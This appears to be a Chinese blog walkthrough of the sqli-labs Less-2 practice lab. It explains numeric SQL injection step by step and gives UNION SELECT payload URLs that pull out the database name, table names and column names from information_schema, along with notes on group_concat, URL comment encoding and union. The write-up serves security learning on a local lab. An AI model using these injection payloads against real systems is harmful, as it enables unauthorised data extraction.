目录
解题思路
首先还是需要判断是否存在sql注入漏洞,寻找注入点,SQL注入通常有两种类型,整形注入和字符型注入,那么我们要判断这是哪种注入就要分析这里的报错语句,输入–+将sql后面的语句注释掉后,发现页面回显是否正常就可以来判断类型,接着使用order by 语句判断,该表中一共有几列数据,然后将id=1改为一个数据库不存在的id值,如-1,使用union select 1,2,3联合查询语句查看页面是否有显示位,最后就是爆库,爆表,爆字段。
爆库
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,database()–+
爆表
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+
爆字段
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’–+
总结
group_concat() 函数
group_concat()会计算哪些行属于同一组,将属于同一组的列显示出来。要返回哪些列,由函数参数(就是字段名)决定。分组必须有个标准,就是根据group by指定的列进行分组,也就是用于将SQL语句的结果拼接在一起。
--
在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用–+代替-- ,原因是+在URL被URL编码后会变成空格。
order by
可以通过使用order by 语句来判断,该表中一共有几列数据。(判断方法是页面回显是否正常)。
union
对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序;union在进行表链接后会筛选掉重复的记录,所以在表链接后会对所产生的结果集进行排序运算,删除重复的记录再返回结果。在题中左边的select子句查询结果为空,那么union右边的查询结果自然就成为了第一行,打印在网页上了。将id改成-1,使union前面的语句报错,就会执行后面的。
125
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
